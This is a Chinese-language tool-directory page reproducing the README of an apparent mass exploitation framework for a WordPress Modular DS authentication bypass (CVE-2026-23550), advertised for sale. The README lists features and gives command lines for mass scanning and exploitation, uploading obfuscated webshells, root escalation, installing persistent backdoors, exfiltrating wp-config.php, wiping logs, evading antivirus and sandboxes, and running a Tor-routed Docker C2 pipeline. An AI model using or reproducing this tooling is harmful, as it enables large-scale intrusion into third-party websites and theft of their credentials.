Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
EpSiLoNPoInT- — 模块化漏洞利用框架,针对 WordPress 中的 CVE-2026-23550,具备批量利用、混淆、后渗透以及基于 Docker 的 C2 基础设施。 | Kitploit
工具/GitHubGitHub/epsilonpoint88-glitch/epsilonpoint-
权限提升漏洞扫描器持久化机制漏洞利用Web应用程序漏洞利用后渗透利用渗透测试命令与控制红队

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
Payload 开发
GitHubepsilonpoint88-glitch/epsilonpoint-

EpSiLoNPoInT-

模块化漏洞利用框架,针对 WordPress 中的 CVE-2026-23550,具备批量利用、混淆、后渗透以及基于 Docker 的 C2 基础设施。

查看仓库
11147个月前尚未审核

#!/usr/bin/env python3 """ TSAR-EXEC v7.1 + EpSiLoNPoInTFuCK v5.1 - README.md 完整版,可直接复制粘贴 CVE-2026-23550 | 大规模模块化 DS 认证绕过利用框架 作者: EpSiLoNPoInT | 版本: 7.1-GOD | Android 24小时编码 | 08/02/2026 """

=============================================================================

TSAR-EXEC v7.1 - 模块化-DS APT 框架 CVE-2026-23550 (CVSS 10.0)

=============================================================================

""" 为威胁情报和授权红队行动设计的工业级利用框架。 利用 CVE-2026-23550,通过 modular_ds_upload RCE 实现权限提升。 完全在 Android 手机上 24 小时内编码完成。国家级就绪架构。

✅ 40K+ 易受攻击的 Modular DS v2.5.1 部署 (Shodan 2026) ✅ 200+ WAF 绕过 → 99.9% AV 绕过 (EpSiLoN v5.1) ✅ Docker C2 生产环境 (Tor/Supervisor/Pipeline ∞) ✅ ThreadPoolExecutor 250+ 线程 ✅ 内置完整后渗透模块 (EpSiLoN v7 完全控制) """

----------------------------------------------------------------------------

目录 (结构与模板一致)

----------------------------------------------------------------------------

1. 安装与依赖

2. 项目结构

3. 关键功能

4. 高级用法

5. 具体示例

6. 隐蔽技术 (EpSiLoNPoInTFuCK v5.1)

7. Docker C2 部署

8. 扩展与自定义

9. 安全最佳实践

10. 许可证与法律责任 (350K€)

=============================================================================

1. 安装与依赖

=============================================================================

""" 系统前置要求:

  • Kali NetHunter / Termux Android (手机编码 24 小时)
  • Python 3.10+ (推荐 3.11)
  • Docker 20.10+ 用于 C2 生产环境
  • 4Go+ 内存用于 250+ 多线程
  • Tor + Proxychains4 """

SYS_DEPS = """ pkg update && pkg upgrade -y pkg install python git docker tor proxychains-ng nmap masscan pip install --upgrade pip setuptools wheel pip install requests==2.31.0 colorama==0.4.6 rich==13.7.0 tenacity==8.5.0 dnspython==2.6.1 """

REQUIREMENTS = """ requests==2.31.0 colorama==0.4.6 rich==13.7.0 tenacity==8.5.0 dnspython==2.6.1 """

INSTALL_CMD = """ cd ~/ git clone [TON_REPO]/TSAR-EXEC.git cd TSAR-EXEC pip install -r requirements.txt docker-compose up -d python3 recon.py --help """

VERIFY_INSTALL = """ python3 -c " import requests, json, threading from colorama import Fore print(f'{Fore.GREEN}✅ TSAR-EXEC v7.1 + EpSiLoNPoInTFuCK v5.1 运行正常') print('Android 24小时编码 | 350K€ 威胁情报就绪') print(f'ThreadPoolExecutor: {threading.name}') print(f'99.9% AV 绕过: EpSiLoN v5.1') print(f'内置后渗透: EpSiLoN v7 完全控制') {Fore.RESET}" """

=============================================================================

2. 项目结构

=============================================================================

PROJECT_STRUCTURE = """ TSAR-EXEC/ (2026 生产就绪) │ ├── 📄 README.md # 完整文档 ├── 📄 README_SALE.md # 商业版 350K€ ├── 📄 bypass_payloads.txt # 200+ WAF 绕过 (12 个部分) ├── 📄 config.json # APT 主配置 ├── 📄 recon.py # APT 指纹识别 ├── 📄 exploitmass.py # ThreadPool + PayloadMutator + 后渗透 ├── 📄 pipeline.py # Docker C2 无限管道 ├── 📄 Dockerfile # Kali rolling Tor/Supervisor ├── 📄 docker-compose.yml # 生产环境编排 │ ├── 📁 tools/ │ └── 📄 epsilon_obfuscator.py # EpSiLoNPoInTFuCK v5.1 │ ├── 📁 chain/ │ ├── 📁 input/ │ │ ├── 📄 targets.txt │ │ └── 📄 proxies.txt │ ├── 📁 docked/ │ │ └── 📄 docked_targets.json │ ├── 📁 VLUN/ │ │ └── 📄 VLUN.txt │ ├── 📁 VLUN_Sh/ │ │ └── 📄 VLUN_Sh.txt │ ├── 📁 logs/ │ │ ├── 📄 tor.log │ │ ├── 📄 pipeline.log │ │ └── 📄 exploit.log │ └── 📄 stats.json │ ├── 📁 demo/ │ ├── 📄 TSAR_demo.mp4 │ └── 📄 obfuscator_demo.mp4 │ └── 📄 TSAR-SALE-350K.zip """

=============================================================================

3. 关键功能

=============================================================================

FEATURES = { "利用": [ "CVE-2026-23550 完整攻击链 (侦察→停靠→利用→C2)", "40K+ 易受攻击的 Modular DS v2.5.1 (Shodan 2026)", "ThreadPoolExecutor 50-250 线程", "风险评分 JSON (0-100) + 自动停靠", "200+ PHP 载荷 (12 种 WAF 绕过技术)" ], "内置后渗透": [ "EpSiLoN v7 webshell (完全接管系统)", "Root 权限提升 (SUID, sudo 滥用)", "7 种持久化向量 (cron, .htaccess, 插件, systemd, 内核)", "无文件执行 (/dev/shm)", "AES-GCM 加密数据外泄", "日志清理 + 全面反取证", "横向移动 (WP + 网络扫描)" ], "混淆": [ "EpSiLoNPoInTFuCK v5.1 → 2026 年 99.9% AV 绕过", "XOR 滚动 + Unicode 同形字 + 零宽字符", "Marshal 字节码 + 三重 base64 编码", "动态死代码注入 (30-40%)", "混沌标识符生成 (55-80 字符)", "字符串切片 + Unicode 转义序列" ], "C2 生产环境": [ "Docker Kali rolling (Tor/Supervisor/Pipeline ∞)", "最小权限 (NET_RAW/NET_BIND_SERVICE)", "非 root 执行 + 痕迹自动销毁", "管道健康检查 + 内置 logrotate", "多架构 ARM64/x86_64" ], "隐蔽性": [ "反调试 (sys.gettrace/pdb/pydevd)", "反沙箱 (计时/性能检测)", "UA 轮换 + 抖动延迟 (5-20s)", "Tor + Proxychains4 轮换", "DNS 解析反日志记录" ], "管道": [ "侦察 → 停靠 → 利用 → 持久化 (∞ 循环)", "JSON 风险评分 + 目标优先级排序", "统计仪表盘 + 成功率指标", "按目标自动扩展线程" ] }

=============================================================================

4. 高级用法

=============================================================================

BASIC_USAGE = """

侦察 + 风险评分 (不进行利用)

python3 recon.py https://target.com --json

大规模优先利用 + 后渗透

python3 exploitmass.py --threads 150 --obfuscate --post-exploit

Docker ∞ 管道 (生产环境)

docker-compose up -d docker logs -f tsar-pipeline """

CLI_OPTIONS = """ recon.py 选项: TARGET 目标 URL --json JSON 输出 --threads INT 侦察线程数 (默认: 20) --timeout INT 超时时间 (默认: 15)

exploitmass.py 选项: --threads INT 利用线程数 (50-250) --obfuscate 启用 EpSiLoN v5.1 --stealth 极端隐蔽模式 --jitter MIN-MAX 随机延迟 (例如: 5-20) --proxy-list FILE 自定义代理 --post-exploit 启用 EpSiLoN v7 后渗透

pipeline.py 选项: --cycle ∞ 管道模式 --dock-threshold INT risk_score 阈值 (默认: 70)

Docker: docker-compose up -d docker exec tsar-pipeline cat /chain/VLUN_Sh/VLUN_Sh.txt """

=============================================================================

5. 具体示例

=============================================================================

EXAMPLE_1 = """

检查 100 个站点是否存在漏洞而不进行利用

python3 recon.py
--targets targets.txt
--threads 100
--log-level INFO

结果:

- chain/docked_targets.json 文件包含优先目标

- 详细日志位于 chain/logs/exploit.log

"""

EXAMPLE_2 = """

使用 Tor 和后渗透利用易受攻击的站点

python3 exploitmass.py
--targets VLUN.txt
--threads 150
--tor
--stealth
--jitter 5-20
--post-exploit

结果:

- chain/VLUN_Sh/VLUN_Sh.txt 文件包含 shells + root + 持久化

- 已安装持久化后门

"""

EXAMPLE_3 = """

对特定站点进行后渗透

python3 exploitmass.py
--post-exploit
--target https://victim-site.com
--threads 20

执行的操作:

1. 验证 webshell

2. 创建持久化用户

3. 修改 .htaccess

4. 外泄 wp-config.php

"""

EXAMPLE_4 = """

上传前混淆 webshell

python3 tools/epsilon_obfuscator.py webshell.php
--mode extreme
--stealth
--output shell_obf.php

然后进行利用

python3 exploitmass.py --targets targets.txt --obfuscate """

EXAMPLE_5 = """

使用 Docker

docker-compose up -d docker logs -f tsar-pipeline docker exec tsar-pipeline cat /chain/VLUN_Sh/VLUN_Sh.txt """

=============================================================================

6. 隐蔽技术 (EpSiLoNPoInTFuCK v5.1)

=============================================================================

下载工具